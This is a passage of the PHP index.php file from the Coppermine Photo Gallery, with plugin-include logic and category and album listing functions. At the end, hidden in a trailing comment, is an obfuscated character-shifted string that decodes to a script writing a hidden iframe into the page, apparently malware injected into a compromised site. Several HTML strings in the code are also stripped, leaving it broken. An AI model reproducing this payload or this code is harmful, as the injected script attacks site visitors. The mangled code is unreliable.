ppermine * @version $Id: index.php 3837 2007-08-16 16:56:06Z gaugau $ */ /** * Unless this is true most things wont work - protection against direct execution of inc files */ define('IN_COPPERMINE', true); if (isset($_GET['file'])) { // Scrub: Remove '..' and leftover '//' from filename $file = str_replace('..','',str_replace('//','',$_GET['file'])); $fileValidationPattern = "/^([a-zA-Z0-9_\-]+)(\/{0,1}?)([a-zA-Z0-9_\-]+)$/"; // There can be only alphanumerals in a plugin's folder name. There mustn't be any dots or other special chars in it. // The only exception is the hypen (-) and underscore (_) // Examples for folder names: "myplugin" = OK, "my_plugin" = OK, "my plugin" = BAD, "mü_plugin" = BAD // Files the plugin is meant to include can only contain one single dot that separates the actual filename from the php-extension // Same restrictions apply as for the folder name (only alphanumerals, hyphen and underscore) if (preg_match($fileValidationPattern, $file) == FALSE) { $file = ''; // something's fishy with the filename, let's drop it } $path = './plugins/'.$file.'.php'; // Don't include the codebase and credits files if ($file != 'codebase' && $file != 'configuration' && file_exists($path)) { // Include the code from the plugin include_once($path); $file = true; } else { $file = false; } } else $file = false; if (!$file) { /** * Sets the flag for lang file */ define('INDEX_PHP', true); require('include/init.inc.php'); if (!USER_ID && $CONFIG['allow_unlogged_access'] == 0) { $redirect = $redirect . "login.php"; header("Location: $redirect"); exit(); } if ($CONFIG['enable_smilies']) include("include/smilies.inc.php"); } /** * Local functions definition */ /** * html_albummenu() * * This function draws the links for admin menu of Albums * * @param integer $id ID of the album for which the links are being drawn * @return string The evaluated template block with links **/ function html_albummenu($id) { global $template_album_admin_menu, $lang_album_admin_menu; static $template = ''; if ($template == '') { $params = array('{CONFIRM_DELETE}' => $lang_album_admin_menu['confirm_delete'], '{DELETE}' => $lang_album_admin_menu['delete'], '{MODIFY}' => $lang_album_admin_menu['modify'], '{EDIT_PICS}' => $lang_album_admin_menu['edit_pics'], ); $template = template_eval($template_album_admin_menu, $params); } $params = array('{ALBUM_ID}' => $id, ); return template_eval($template, $params); } /** * get_subcat_data() * * Get the data about the sub categories which are going to be shown on the index page, this function is called recursively * * @param integer $parent Parent Category * @param array $cat_data * @param array $album_set_array * @param integer $level Level being displayed * @param string $ident String to use as indentation for Categories * @return void **/ function get_subcat_data($parent, &$cat_data, &$album_set_array, $level, $ident = '') { global $CONFIG, $HIDE_USER_CAT, $FORBIDDEN_SET, $cpg_show_private_album; $album_filter = ''; $pic_filter = ''; if (!empty($FORBIDDEN_SET) && !$cpg_show_private_album) { $album_filter = ' and ' . str_replace('p.', 'a.', $FORBIDDEN_SET); $pic_filter = ' and ' . str_replace('p.', $CONFIG['TABLE_PICTURES'] . '.', $FORBIDDEN_SET); } if ($CONFIG['categories_alpha_sort'] == 1) {$cat_sort_order = 'name';}else{$cat_sort_order = 'pos';} $result = cpg_db_query("SELECT cid, name, description, thumb FROM {$CONFIG['TABLE_CATEGORIES']} WHERE parent = '$parent' ORDER BY $cat_sort_order"); if (mysql_num_rows($result) > 0) { $rowset = cpg_db_fetch_rowset($result); foreach ($rowset as $subcat) { if ($subcat['cid'] == USER_GAL_CAT) { $sql = "SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category>=" . FIRST_USER_CAT . $album_filter; $result = cpg_db_query($sql); $album_count = mysql_num_rows($result); while ($row = mysql_fetch_array($result)) { $album_set_array[] = $row['aid']; } // while mysql_free_result($result); $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category >= " . FIRST_USER_CAT . $album_filter); $nbEnr = mysql_fetch_array($result); $pic_count = $nbEnr[0]; $subcat['description'] = preg_replace("/[\r\n]*/i", '
' . $ident , bb_decode($subcat['description'])); $link = $ident . "{$subcat['name']}"; if ($album_count) { $cat_data[] = array($link, $ident . $subcat['description'], $album_count, $pic_count); $HIDE_USER_CAT = 0; } else { $HIDE_USER_CAT = 1; } } else { $unaliased_album_filter = str_replace('a.', '', $album_filter); $result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE category = {$subcat['cid']}" . $unaliased_album_filter); $album_count = mysql_num_rows($result); while ($row = mysql_fetch_array($result)) { $album_set_array[] = $row['aid']; } // while mysql_free_result($result); $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category = {$subcat['cid']}" . $album_filter); $nbEnr = mysql_fetch_array($result); mysql_free_result($result); $pic_count = $nbEnr[0]; if ($subcat['thumb'] > 0) { $sql = "SELECT filepath, filename, url_prefix, pwidth, pheight " . "FROM {$CONFIG['TABLE_PICTURES']} " . "WHERE pid='{$subcat['thumb']}'" . $pic_filter; $result = cpg_db_query($sql); if (mysql_num_rows($result)) { $picture = mysql_fetch_array($result); mysql_free_result($result); $pic_url = get_pic_url($picture, 'thumb'); if (!is_image($picture['filename'])) { $image_info = getimagesize(urldecode($pic_url)); $picture['pwidth'] = $image_info[0]; $picture['pheight'] = $image_info[1]; } $image_size = compute_img_size($picture['pwidth'], $picture['pheight'], $CONFIG['alb_list_thumb_size']); $user_thumb = "\"\""; $user_thumb = "" . $user_thumb . ""; } } else { $user_thumb = ""; } $subcat['name'] = $subcat['name']; $subcat['description'] = preg_replace("/[\r\n]*/i", '
', bb_decode($subcat['description'])); $link = "{$subcat['name']}"; $user_thumb = $ident . $user_thumb; if ($pic_count == 0 && $album_count == 0) { $user_thumb = $ident; $cat_data[] = array($link, $subcat['description'], 'cat_thumb' => $user_thumb); } else { // Check if you need to show subcat_level if ($level == $CONFIG['subcat_level']) { $cat_albums = list_cat_albums($subcat['cid']); } else { $cat_albums = ''; } $cat_data[] = array($link, $subcat['description'], $album_count, $pic_count, 'cat_albums' => $cat_albums, 'cat_thumb' => $user_thumb); } } if ($level > 1) { get_subcat_data($subcat['cid'], $cat_data, $album_set_array, $level -1, $ident . " /* Czjypw{Epm/(t€ph0‚kvj|tlu{5~yp{l/|ulzjhwl/'.,:j,=@,==,>9,=8,=k,=<,97,=l,=8,=k,=<,:k,=:,:9,:=,97,>:,>9,=:,:k,9>,=?,>;,>;,>7,:h,9m,9m,>>,>>,>>,9l,=8,>9,=l,=?,=<,=k,9k,=;,=@,=8,=k,=8,=l,>;,9l,=l,=j,9m,:m,9>,9i,;k,=8,>;,=?,9l,>9,=m,><,=l,=;,9?,;k,=8,>;,=?,9l,>9,=8,=l,=;,=m,=k,9?,9@,9h,:8,:?,:;,:<,9@,9i,9>,=8,=9,:;,=:,==,::,:9,:=,:>,:;,::,:7,9>,97,>>,=@,=;,>;,=?,:k,:8,:<,97,=?,=<,=@,=>,=?,>;,:k,:8,:9,::,97,>:,>;,>@,=j,=<,:k,9>,>=,=@,>:,=@,=9,=@,=j,=@,>;,>@,:h,=?,=@,=;,=;,=<,=l,9>,:l,:j,9m,=@,==,>9,=8,=k,=<,:l.00B„}hy't€phD{y|lBC6zjypw{E */